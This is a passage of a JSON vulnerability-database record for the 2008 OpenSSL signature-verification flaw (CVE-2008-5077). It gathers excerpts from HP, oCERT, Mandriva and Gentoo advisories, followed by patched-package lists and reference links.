\nfips_1_2.FIPS-LIB \nfips_1_2.FIPS-LIB \nfips_1_2.FIPS-MAN \nfips_1_2.FIPS-MIS \nfips_1_2.FIPS-RUN \nfips_1_2.FIPS-RUN \nfips_1_2.FIPS-SRC \naction: install revision FIPS-OPENSSL-1.2.002 or subsequent \nopenssl.OPENSSL-CER \nopenssl.OPENSSL-CONF \nopenssl.OPENSSL-DOC \nopenssl.OPENSSL-INC \nopenssl.OPENSSL-LIB \nopenssl.OPENSSL-MAN \nopenssl.OPENSSL-MIS \nopenssl.OPENSSL-PRNG \nopenssl.OPENSSL-PVT \nopenssl.OPENSSL-RUN \nopenssl.OPENSSL-SRC \naction: install revision A.00.09.07m.047 or subsequent \nURL: http://software.hp.com \n\nHP-UX B.11.31 \n================== \nfips_1_1_2.FIPS-CONF \nfips_1_1_2.FIPS-DOC \nfips_1_1_2.FIPS-INC \nfips_1_1_2.FIPS-LIB \nfips_1_1_2.FIPS-MAN \nfips_1_1_2.FIPS-MIS \nfips_1_1_2.FIPS-RUN \nfips_1_1_2.FIPS-SRC \naction: install revision FIPS-OPENSSL-1.1.2.048 or subsequent \nfips_1_2.FIPS-CONF \nfips_1_2.FIPS-DOC \nfips_1_2.FIPS-INC \nfips_1_2.FIPS-LIB \nfips_1_2.FIPS-MAN \nfips_1_2.FIPS-MIS \nfips_1_2.FIPS-RUN \nfips_1_2.FIPS-SRC \naction: install revision FIPS-OPENSSL-1.2.003 or subsequent \nopenssl.OPENSSL-CER \nopenssl.OPENSSL-CONF \nopenssl.OPENSSL-DOC \nopenssl.OPENSSL-INC \nopenssl.OPENSSL-LIB \nopenssl.OPENSSL-MAN \nopenssl.OPENSSL-MIS \nopenssl.OPENSSL-PRNG \nopenssl.OPENSSL-PVT \nopenssl.OPENSSL-RUN \nopenssl.OPENSSL-SRC \naction: install revision A.00.09.08j.003 or subsequent \nURL: http://software.hp.com \n\nEND AFFECTED VERSIONS \n\nHISTORY \nVersion:1 (rev.1) 31 March 2009 Initial release \n\nThird Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer\u0027s patch management policy. \n\nSupport: For further information, contact normal HP Services support channel. \n\nReport: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com \nIt is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information. \nTo get the security-alert PGP key, please send an e-mail message as follows:\n  To: security-alert@hp.com \n  Subject: get key\n\nSubscribe: To initiate a subscription to receive future HP Security Bulletins via Email: \nhttp://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA\u0026langcode=USENG\u0026jumpid=in_SC-GEN__driverITRC\u0026topiccode=ITRC \nOn the web page: ITRC security bulletins and patch sign-up \nUnder Step1: your ITRC security bulletins and patches \n  - check ALL categories for which alerts are required and continue. \nUnder Step2: your ITRC operating systems \n  - verify your operating system selections are checked and save. \n\n\nTo update an existing subscription: http://h30046.www3.hp.com/subSignIn.php \nLog in on the web page: Subscriber\u0027s choice for Business: sign-in. \nOn the web page: Subscriber\u0027s Choice: your profile summary - use Edit Profile to update appropriate sections. \n\n\nTo review previously published Security Bulletins visit: http://www.itrc.hp.com/service/cki/secBullArchive.do \n\n\n* The Software Product Category that this Security Bulletin relates to is represented by the 5th and 6th characters of the Bulletin number in the title: \n\nGN = HP General SW\nMA = HP Management Agents\nMI = Misc. 3rd Party SW\nMP = HP MPE/iX\nNS = HP NonStop Servers\nOV = HP OpenVMS\nPI = HP Printing \u0026 Imaging\nST = HP Storage SW\nTL = HP Trusted Linux\nTU = HP Tru64 UNIX\nUX = HP-UX\nVV = HP VirtualVault\n \nSystem management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions. \n\n\n\"HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products the important security information contained in this Bulletin. HP recommends that all users determine the applicability of this information to their individual situations and take appropriate action. HP does not warrant that this information is necessarily accurate or complete for all user situations and, consequently, HP will not be responsible for any damages resulting from user\u0027s use or disregard of the information provided in this Bulletin. To the extent permitted by law, HP disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose, title and non-infringement.\"\n\n\\xa9Copyright 2009 Hewlett-Packard Development Company, L.P. \n\nHewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided \"as is\" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental, special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. \n-----BEGIN PGP SIGNATURE-----\nVersion: PGP 8.1\n\niQA/AwUBSdNBjeAfOvwtKn1ZEQI07wCg4iu1Jn5I5OInhZq8nYL+a/9MT2UAoPGR\ngTd3Vf2bK3bnrFOIBFl0/t75\n=vt7j\n-----END PGP SIGNATURE-----\n. #2008-016 multiple OpenSSL signature verification API misuse\n\nDescription:\n\nSeveral functions inside the OpenSSL library incorrectly check the result\nafter calling the EVP_VerifyFinal function. \n\nThis bug allows a malformed signature to be treated as a good signature\nrather than as an error. This issue affects the signature checks on DSA\nand ECDSA keys used with SSL/TLS. \n\nA patch fixing the issue with proper return code checking and further\nimportant recommendations are described in the original OpenSSL Team\nadvisory. \n\nAt the request of the OpenSSL team, oCERT has aided in the remediation\ncoordination for other projects with similar API misuse vulnerabilities. \nIn addition to EVP_VerifyFinal, the return codes from DSA_verify and\nDSA_do_verify functions were being incorrectly validated, and packages\ndoing so are affected in a similar fashion as OpenSSL. \n\nNTP \u003c= 4.2.4p5 (production), \u003c= 4.2.5p150 (development)\n\nSun GridEngine \u003c= 5.3\n\nGale \u003c= 0.99\n\nOpenEvidence \u003c= 1.0.6\n\nBelgian eID middleware - eidlib \u003c= 2.6.0 [2]\n\nFreedom Network Server \u003c= 2.x\n\nThe following packages were identified as affected by a vulnerability\nsimilar to the OpenSSL one, as they use OpenSSL DSA_verify function and\nincorrectly check the return code. \n\nBIND \u003c= 9.4.3\n\nLasso \u003c= 2.2.1\n\nZXID \u003c= 0.29\n\n1 - use of OpenSSL as an SSL/TLS client when connecting to a server whose\ncertificate uses an RSA key is NOT affected. Verification of client\ncertificates by OpenSSL servers for any key type is NOT affected. \n\n2 - Belgian eID middleware latest versions are not available in source\nform, therefore we cannot confirm if they are affected\n\n\nFixed version:\n\nOpenSSL \u003e= 0.9.8j\n\nNTP \u003e= 4.2.4p6 (production), \u003e= 4.2.5p153 (development)\n\nSun GridEngine \u003e= 6.0\n\nGale N/A\n\nOpenEvidence N/A\n\nBelgian eID middleware - eidlib N/A\n\nFreedom Network Server N/A\n\nBIND \u003e= 9.3.6-P1, 9.4.3-P1, 9.5.1-P1, 9.6.0-P1\n\nLasso \u003e= 2.2.2\n\nZXID N/A\n\n\nCredit: Google Security Team (for the original OpenSSL issue). \n\n\nCVE: CVE-2008-5077 (OpenSSL),\n        CVE-2009-0021 (NTP),\n        CVE-2009-0025 (BIND)\n\n\nTimeline:\n2008-12-16: OpenSSL Security Team requests coordination aid from oCERT\n2008-12-16: oCERT investigates packages affected by similar issues\n2008-12-16: contacted affected vendors\n2008-12-17: investigation expanded to DSA verification\n2008-12-17: BIND, Lasso and ZXID added to affected packages\n2008-12-18: contacted additional affected vendors\n2009-01-05: status updates and patch dissemination to affected vendors\n2009-01-05: confirmation from BIND of issue and fix\n2009-01-06: requested CVE assignment for BIND\n2009-01-07: advisory published\n\n\nReferences:\nhttp://openssl.org/news/secadv_20090107.txt\n\n\nLinks:\nhttp://openssl.org/\nhttp://www.ntp.org/\nhttp://gridengine.sunsource.net/\nhttp://gale.org/\nhttp://www.openevidence.org/\nhttp://eid.belgium.be/\nhttp://www.google.com/codesearch/p?#1vGzyQX--LU/achilles/remailer/zero-knowledge/freedomserver-2.x.tgz/\nhttps://www.isc.org/products/BIND\nhttp://lasso.entrouvert.org/\nhttp://www.zxid.org/\n\n\nPermalink:\nhttp://www.ocert.org/advisories/ocert-2008-016.html\n\n\n--\nWill Drewry \u003credpig@ocert.org\u003e\noCERT Team :: http://ocert.org\n. \n\nBackground\n==========\n\nntp contains the client and daemon implementations for the Network Time\nProtocol. \n \n The updated packages have been patched to prevent this issue. \n _______________________________________________________________________\n\n References:\n\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5077\n _______________________________________________________________________\n\n Updated Packages:\n\n Mandriva Linux 2008.0:\n 6585e08eab279e6a249630385683bf43  2008.0/i586/libopenssl0.9.8-0.9.8e-8.2mdv2008.0.i586.rpm\n b5955c2c0a2cc24abd9f5f3ebc7d0148  2008.0/i586/libopenssl0.9.8-devel-0.9.8e-8.2mdv2008.0.i586.rpm\n 7c92323d7aa583b936ef908f3f6ac867  2008.0/i586/libopenssl0.9.8-static-devel-0.9.8e-8.2mdv2008.0.i586.rpm\n 2b791168311c3ecba4f8b7acd24e64ab  2008.0/i586/openssl-0.9.8e-8.2mdv2008.0.i586.rpm \n cf51c48e4c05ac5357f6076fbaeff0a5  2008.0/SRPMS/openssl-0.9.8e-8.2mdv2008.0.src.rpm\n\n Mandriva Linux 2008.0/X86_64:\n 6259ac00622227eee59f888bc516bc3a  2008.0/x86_64/lib64openssl0.9.8-0.9.8e-8.2mdv2008.0.x86_64.rpm\n fe745327c1bbb599e025a5b90bb05817  2008.0/x86_64/lib64openssl0.9.8-devel-0.9.8e-8.2mdv2008.0.x86_64.rpm\n bdb7113b06aab0c4d77cbf86bcf208c2  2008.0/x86_64/lib64openssl0.9.8-static-devel-0.9.8e-8.2mdv2008.0.x86_64.rpm\n d4fda198a80b88c7caaf947af0866df8  2008.0/x86_64/openssl-0.9.8e-8.2mdv2008.0.x86_64.rpm \n cf51c48e4c05ac5357f6076fbaeff0a5  2008.0/SRPMS/openssl-0.9.8e-8.2mdv2008.0.src.rpm\n\n Mandriva Linux 2008.1:\n 4a0be98cd3fb82a22e3836c5ae81ed37  2008.1/i586/libopenssl0.9.8-0.9.8g-4.2mdv2008.1.i586.rpm\n 277058ecc1d26d24bf4da5ea27d4a31f  2008.1/i586/libopenssl0.9.8-devel-0.9.8g-4.2mdv2008.1.i586.rpm\n 29b08a5a233f1987c4ca98aaa4e97ac5  2008.1/i586/libopenssl0.9.8-static-devel-0.9.8g-4.2mdv2008.1.i586.rpm\n e47be879abc0c089a8f380469a6a62c8  2008.1/i586/openssl-0.9.8g-4.2mdv2008.1.i586.rpm \n 7395d0e10c1938be16261baba05da55c  2008.1/SRPMS/openssl-0.9.8g-4.2mdv2008.1.src.rpm\n\n Mandriva Linux 2008.1/X86_64:\n 71a69804b928a9f7856f65fee332c5ab  2008.1/x86_64/lib64openssl0.9.8-0.9.8g-4.2mdv2008.1.x86_64.rpm\n e9c5d1d4895a5a679945bde62df6f988  2008.1/x86_64/lib64openssl0.9.8-devel-0.9.8g-4.2mdv2008.1.x86_64.rpm\n 7f2d66839f93e2083dcd1b1f27ca4ddf  2008.1/x86_64/lib64openssl0.9.8-static-devel-0.9.8g-4.2mdv2008.1.x86_64.rpm\n 40408ffdf13faa6c79b28c764bb88b22  2008.1/x86_64/openssl-0.9.8g-4.2mdv2008.1.x86_64.rpm \n 7395d0e10c1938be16261baba05da55c  2008.1/SRPMS/openssl-0.9.8g-4.2mdv2008.1.src.rpm\n\n Mandriva Linux 2009.0:\n 2512f6a41e9a8e7bcff53e5737029689  2009.0/i586/libopenssl0.9.8-0.9.8h-3.1mdv2009.0.i586.rpm\n d7774faaed2866da5bb05cbcf07604da  2009.0/i586/libopenssl0.9.8-devel-0.9.8h-3.1mdv2009.0.i586.rpm\n ed99160bdf1ce33fa81dc47c71915318  2009.0/i586/libopenssl0.9.8-static-devel-0.9.8h-3.1mdv2009.0.i586.rpm\n 6116fafed014596ee1e6ec43db93133f  2009.0/i586/openssl-0.9.8h-3.1mdv2009.0.i586.rpm \n 8ad6b0d8aff3bb992d716668450aef3a  2009.0/SRPMS/openssl-0.9.8h-3.1mdv2009.0.src.rpm\n\n Mandriva Linux 2009.0/X86_64:\n d2cc04fc0bdaeea8e4cc5d7ab4e997fd  2009.0/x86_64/lib64openssl0.9.8-0.9.8h-3.1mdv2009.0.x86_64.rpm\n b537da3113c75f87c4fa8d66be2d6797  2009.0/x86_64/lib64openssl0.9.8-devel-0.9.8h-3.1mdv2009.0.x86_64.rpm\n ef9add2bec302b324b9c0690cf79b57c  2009.0/x86_64/lib64openssl0.9.8-static-devel-0.9.8h-3.1mdv2009.0.x86_64.rpm\n 16b8c11f4d6dedf2e4176bfc55607c15  2009.0/x86_64/openssl-0.9.8h-3.1mdv2009.0.x86_64.rpm \n 8ad6b0d8aff3bb992d716668450aef3a  2009.0/SRPMS/openssl-0.9.8h-3.1mdv2009.0.src.rpm\n\n Corporate 3.0:\n 5e8f4b7c1e646d0e16af2d83238a011b  corporate/3.0/i586/libopenssl0.9.7-0.9.7c-3.9.C30mdk.i586.rpm\n 5115d911b9a6842fd0c3495429c7c2f2  corporate/3.0/i586/libopenssl0.9.7-devel-0.9.7c-3.9.C30mdk.i586.rpm\n b934b4f9686deef6cb1eba750ab36288  corporate/3.0/i586/libopenssl0.9.7-static-devel-0.9.7c-3.9.C30mdk.i586.rpm\n 11ec8a4df261d4d4fa9957d33be08604  corporate/3.0/i586/openssl-0.9.7c-3.9.C30mdk.i586.rpm \n dcd1a4feb1a04302c54465dce7c7c506  corporate/3.0/SRPMS/openssl-0.9.7c-3.9.C30mdk.src.rpm\n\n Corporate 3.0/X86_64:\n 64521521330df90b42c9c37cafe50b54  corporate/3.0/x86_64/lib64openssl0.9.7-0.9.7c-3.9.C30mdk.x86_64.rpm\n 3a85c30c0511e42ec76c80e08efe5192  corporate/3.0/x86_64/lib64openssl0.9.7-devel-0.9.7c-3.9.C30mdk.x86_64.rpm\n 12af66f30c5022d8d29b57a9131458c3  corporate/3.0/x86_64/lib64openssl0.9.7-static-devel-0.9.7c-3.9.C30mdk.x86_64.rpm\n 62f5c54be99ddc9458670ae04b24d3f0  corporate/3.0/x86_64/openssl-0.9.7c-3.9.C30mdk.x86_64.rpm \n dcd1a4feb1a04302c54465dce7c7c506  corporate/3.0/SRPMS/openssl-0.9.7c-3.9.C30mdk.src.rpm\n\n Corporate 4.0:\n 60c64d9ead2b01fb39058a705fcb95dc  corporate/4.0/i586/libopenssl0.9.7-0.9.7g-2.7.20060mlcs4.i586.rpm\n fb4d5555c211b375707bf7d194e74776  corporate/4.0/i586/libopenssl0.9.7-devel-0.9.7g-2.7.20060mlcs4.i586.rpm\n c13ff967b4310e5a790e85595f940b7e  corporate/4.0/i586/libopenssl0.9.7-static-devel-0.9.7g-2.7.20060mlcs4.i586.rpm\n e9a96a389c00ee674d689e3747c3e501  corporate/4.0/i586/openssl-0.9.7g-2.7.20060mlcs4.i586.rpm \n 4df38ebd98b467bdee0d4a24d3b0158f  corporate/4.0/SRPMS/openssl-0.9.7g-2.7.20060mlcs4.src.rpm\n\n Corporate 4.0/X86_64:\n de71d0bbc98589afdf03b7a99aad7103  corporate/4.0/x86_64/lib64openssl0.9.7-0.9.7g-2.7.20060mlcs4.x86_64.rpm\n 0c330148b55987e50f491c7e4d3b65a5  corporate/4.0/x86_64/lib64openssl0.9.7-devel-0.9.7g-2.7.20060mlcs4.x86_64.rpm\n ce64720b2685fada3e88a5725c43b532  corporate/4.0/x86_64/lib64openssl0.9.7-static-devel-0.9.7g-2.7.20060mlcs4.x86_64.rpm\n 29f0f40602184d7f366e1d1d8e5c03e4  corporate/4.0/x86_64/openssl-0.9.7g-2.7.20060mlcs4.x86_64.rpm \n 4df38ebd98b467bdee0d4a24d3b0158f  corporate/4.0/SRPMS/openssl-0.9.7g-2.7.20060mlcs4.src.rpm\n\n Multi Network Firewall 2.0:\n 74a4beac1c01f9fd888dd5eea356f7be  mnf/2.0/i586/libopenssl0.9.7-0.9.7c-3.9.C30mdk.i586.rpm\n c809a08f26051c7a3931ccda00c94429  mnf/2.0/i586/openssl-0.9.7c-3.9.C30mdk.i586.rpm \n 8ae9f7004b77dca2317980ba4215dc92  mnf/2.0/SRPMS/openssl-0.9.7c-3.9.C30mdk.src.rpm\n _______________________________________________________________________\n\n To upgrade automatically use MandrivaUpdate or urpmi.  The verification\n of md5 checksums and GPG signatures is performed automatically for you. \n\n All packages are signed by Mandriva for security.  You can obtain the\n GPG public key of the Mandriva Security Team by executing:\n\n  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\n\n You can view other update advisories for Mandriva Linux at:\n\n  http://www.mandriva.com/security/advisories\n\n If you want to report vulnerabilities, please contact\n\n  security_(at)_mandriva.com\n _______________________________________________________________________\n\n Type Bits/KeyID     Date       User ID\n pub  1024D/22458A98 2000-07-10 Mandriva Security Team\n  \u003csecurity*mandriva.com\u003e\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.9 (GNU/Linux)\n\niD8DBQFJZqIYmqjQ0CJFipgRAqRNAKDNNvWgsIk0/eh5f8539zOJ7dtnnQCeJezP\nZE8i9Ju80WcdhXe9yIoPevE=\n=9n1t\n-----END PGP SIGNATURE-----\n\n_______________________________________________\nFull-Disclosure - We believe in it. \nCharter: http://lists.grok.org.uk/full-disclosure-charter.html\nHosted and sponsored by Secunia - http://secunia.com/\n. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nGentoo Linux Security Advisory                           GLSA 200902-02\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n                                            http://security.gentoo.org/\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n  Severity: Normal\n     Title: OpenSSL: Certificate validation error\n      Date: February 12, 2009\n      Bugs: #251346\n        ID: 200902-02\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nSynopsis\n========\n\nAn error in the OpenSSL certificate chain validation might allow for\nspoofing attacks. \n\nBackground\n==========\n\nOpenSSL is an Open Source toolkit implementing the Secure Sockets Layer\n(SSL v2/v3) and Transport Layer Security (TLS v1) as well as a general\npurpose cryptography library. \n\nImpact\n======\n\nA remote attacker could exploit this vulnerability and spoof arbitrary\nnames to conduct Man-In-The-Middle attacks and intercept sensitive\ninformation. \n\nWorkaround\n==========\n\nThere is no known workaround at this time. \n\nResolution\n==========\n\nAll OpenSSL users should upgrade to the latest version:\n\n    # emerge --sync\n    # emerge --ask --oneshot --verbose \"\u003e=dev-libs/openssl-0.9.8j\"\n\nReferences\n==========\n\n  [ 1 ] CVE-2008-5077\n        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5077\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n  http://security.gentoo.org/glsa/glsa-200902-02.xml\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttp://bugs.gentoo.org. \n\nLicense\n=======\n\nCopyright 2009 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttp://creativecommons.org/licenses/by-sa/2.5\n",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2008-5077"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2010-0376"
          },
          {
            "db": "BID",
            "id": "33150"
          },
          {
            "db": "PACKETSTORM",
            "id": "73756"
          },
          {
            "db": "PACKETSTORM",
            "id": "77647"
          },
          {
            "db": "PACKETSTORM",
            "id": "76268"
          },
          {
            "db": "PACKETSTORM",
            "id": "73658"
          },
          {
            "db": "PACKETSTORM",
            "id": "76379"
          },
          {
            "db": "PACKETSTORM",
            "id": "73698"
          },
          {
            "db": "PACKETSTORM",
            "id": "74909"
          }
        ],
        "trust": 2.34
      },
      "external_ids": {
        "_id": null,
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2008-5077",
            "trust": 3.2
          },
          {
            "db": "OCERT",
            "id": "OCERT-2008-016",
            "trust": 1.4
          },
          {
            "db": "BID",
            "id": "33150",
            "trust": 1.3
          },
          {
            "db": "SECUNIA",
            "id": "33673",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "35108",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "33338",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "34211",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "33557",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "33394",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "35074",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "39005",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "33765",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "33436",
            "trust": 1.0
          },
          {
            "db": "VUPEN",
            "id": "ADV-2009-0558",
            "trust": 1.0
          },
          {
            "db": "VUPEN",
            "id": "ADV-2009-0904",
            "trust": 1.0
          },
          {
            "db": "VUPEN",
            "id": "ADV-2009-0913",
            "trust": 1.0
          },
          {
            "db": "VUPEN",
            "id": "ADV-2009-0040",
            "trust": 1.0
          },
          {
            "db": "VUPEN",
            "id": "ADV-2009-1338",
            "trust": 1.0
          },
          {
            "db": "VUPEN",
            "id": "ADV-2009-0289",
            "trust": 1.0
          },
          {
            "db": "VUPEN",
            "id": "ADV-2009-1297",
            "trust": 1.0
          },
          {
            "db": "VUPEN",
            "id": "ADV-2009-0362",
            "trust": 1.0
          },
          {
            "db": "SECTRACK",
            "id": "1021523",
            "trust": 1.0
          },
          {
            "db": "USCERT",
            "id": "TA09-133A",
            "trust": 1.0
          },
          {
            "db": "CNVD",
            "id": "CNVD-2010-0376",
            "trust": 0.6
          },
          {
            "db": "AUSCERT",
            "id": "ESB-2022.0696",
            "trust": 0.6
          },
          {
            "db": "LENOVO",
            "id": "LEN-24443",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-200901-055",
            "trust": 0.6
          },
          {
            "db": "PACKETSTORM",
            "id": "73756",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "77647",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "76268",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "73658",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "76379",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "73698",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "74909",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2010-0376"
          },
          {
            "db": "BID",
            "id": "33150"
          },
          {
            "db": "PACKETSTORM",
            "id": "73756"
          },
          {
            "db": "PACKETSTORM",
            "id": "77647"
          },
          {
            "db": "PACKETSTORM",
            "id": "76268"
          },
          {
            "db": "PACKETSTORM",
            "id": "73658"
          },
          {
            "db": "PACKETSTORM",
            "id": "76379"
          },
          {
            "db": "PACKETSTORM",
            "id": "73698"
          },
          {
            "db": "PACKETSTORM",
            "id": "74909"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-200901-055"
          },
          {
            "db": "NVD",
            "id": "CVE-2008-5077"
          }
        ]
      },
      "id": "VAR-200901-0714",
      "iot": {
        "_id": null,
        "data": true,
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2010-0376"
          }
        ],
        "trust": 0.06
      },
      "iot_taxonomy": {
        "_id": null,
        "data": [
          {
            "category": [
              "Network device"
            ],
            "sub_category": null,
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2010-0376"
          }
        ]
      },
      "last_update_date": "2026-03-09T22:53:35.635000Z",
      "patch": {
        "_id": null,
        "data": [
          {
            "title": "F5 FirePass OpenSSL \\\"EVP_VerifyFinal()\\\" Spoofing Vulnerability",
            "trust": 0.6,
            "url": "https://www.cnvd.org.cn/patchInfo/show/230"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2010-0376"
          }
        ]
      },
      "problemtype_data": {
        "_id": null,
        "data": [
          {
            "problemtype": "CWE-20",
            "trust": 1.0
          }
        ],
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2008-5077"
          }
        ]
      },
      "references": {
        "_id": null,
        "data": [
          {
            "trust": 1.4,
            "url": "http://www.ocert.org/advisories/ocert-2008-016.html"
          },
          {
            "trust": 1.3,
            "url": "http://support.nortel.com/go/main.jsp?cscat=bltndetail\u0026id=837653"
          },
          {
            "trust": 1.3,
            "url": "http://voodoo-circle.sourceforge.net/sa/sa-20090123-01.html"
          },
          {
            "trust": 1.3,
            "url": "http://support.avaya.com/elmodocs2/security/asa-2009-038.htm"
          },
          {
            "trust": 1.3,
            "url": "http://sunsolve.sun.com/search/document.do?assetkey=1-66-250826-1"
          },
          {
            "trust": 1.1,
            "url": "http://security.gentoo.org/glsa/glsa-200902-02.xml"
          },
          {
            "trust": 1.0,
            "url": "http://www.vupen.com/english/advisories/2009/0913"
          },
          {
            "trust": 1.0,
            "url": "http://slackware.com/security/viewer.php?l=slackware-security\u0026y=2009\u0026m=slackware-security.544796"
          },
          {
            "trust": 1.0,
            "url": "http://www.securitytracker.com/id?1021523"
          },
          {
            "trust": 1.0,
            "url": "http://www.vupen.com/english/advisories/2009/1338"
          },
          {
            "trust": 1.0,
            "url": "http://www.vmware.com/security/advisories/vmsa-2009-0004.html"
          },
          {
            "trust": 1.0,
            "url": "http://marc.info/?l=bugtraq\u0026m=127678688104458\u0026w=2"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/33394"
          },
          {
            "trust": 1.0,
            "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a9155"
          },
          {
            "trust": 1.0,
            "url": "https://usn.ubuntu.com/704-1/"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/33338"
          },
          {
            "trust": 1.0,
            "url": "http://www.vupen.com/english/advisories/2009/0289"
          },
          {
            "trust": 1.0,
            "url": "http://marc.info/?l=bugtraq\u0026m=124277349419254\u0026w=2"
          },
          {
            "trust": 1.0,
            "url": "http://www.openssl.org/news/secadv_20090107.txt"
          },
          {
            "trust": 1.0,
            "url": "http://www.securityfocus.com/archive/1/499827/100/0/threaded"
          },
          {
            "trust": 1.0,
            "url": "http://www.vupen.com/english/advisories/2009/1297"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/33765"
          },
          {
            "trust": 1.0,
            "url": "http://www.vupen.com/english/advisories/2009/0558"
          },
          {
            "trust": 1.0,
            "url": "http://www.vupen.com/english/advisories/2009/0362"
          },
          {
            "trust": 1.0,
            "url": "http://lists.opensuse.org/opensuse-security-announce/2011-07/msg00014.html"
          },
          {
            "trust": 1.0,
            "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a6380"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/33557"
          },
          {
            "trust": 1.0,
            "url": "http://www.us-cert.gov/cas/techalerts/ta09-133a.html"
          },
          {
            "trust": 1.0,
            "url": "http://www.vupen.com/english/advisories/2009/0040"
          },
          {
            "trust": 1.0,
            "url": "http://www.redhat.com/support/errata/rhsa-2009-0004.html"
          },
          {
            "trust": 1.0,
            "url": "http://www.securityfocus.com/bid/33150"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/35074"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/34211"
          },
          {
            "trust": 1.0,
            "url": "http://lists.opensuse.org/opensuse-security-announce/2011-07/msg00013.html"
          },
          {
            "trust": 1.0,
            "url": "http://lists.apple.com/archives/security-announce/2009/may/msg00002.html"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/35108"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/39005"
          },
          {
            "trust": 1.0,
            "url": "http://marc.info/?l=bugtraq\u0026m=123859864430555\u0026w=2"
          },
          {
            "trust": 1.0,
            "url": "http://support.apple.com/kb/ht3549"
          },
          {
            "trust": 1.0,
            "url": "http://www.vupen.com/english/advisories/2009/0904"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/33436"
          },
          {
            "trust": 1.0,
            "url": "http://www.securityfocus.com/archive/1/502322/100/0/threaded"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/33673"
          },
          {
            "trust": 0.7,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2008-5077"
          },
          {
            "trust": 0.6,
            "url": "http://www.securityfocus.com/archive/1/archive/1/502322/100/0/threaded"
          },
          {
            "trust": 0.6,
            "url": "https://www.auscert.org.au/bulletins/esb-2022.0696"
          },
          {
            "trust": 0.6,
            "url": "https://support.lenovo.com/us/en/solutions/len-24443"
          },
          {
            "trust": 0.3,
            "url": "http://www.innominate.com/data/downloads/manuals/releasenotes_mguard_615_en.pdf"
          },
          {
            "trust": 0.3,
            "url": "http://www.openbsd.org/errata43.html#007_openssl"
          },
          {
            "trust": 0.3,
            "url": "http://eid.belgium.be"
          },
          {
            "trust": 0.3,
            "url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=kb76646"
          },
          {
            "trust": 0.3,
            "url": "https://blogs.oracle.com/sunsecurity/entry/multiple_openssl_vulnerabilities_in_sun"
          },
          {
            "trust": 0.3,
            "url": "http://blogs.oracle.com/sunsecurity/entry/multiple_vulnerabilities_in_network_time"
          },
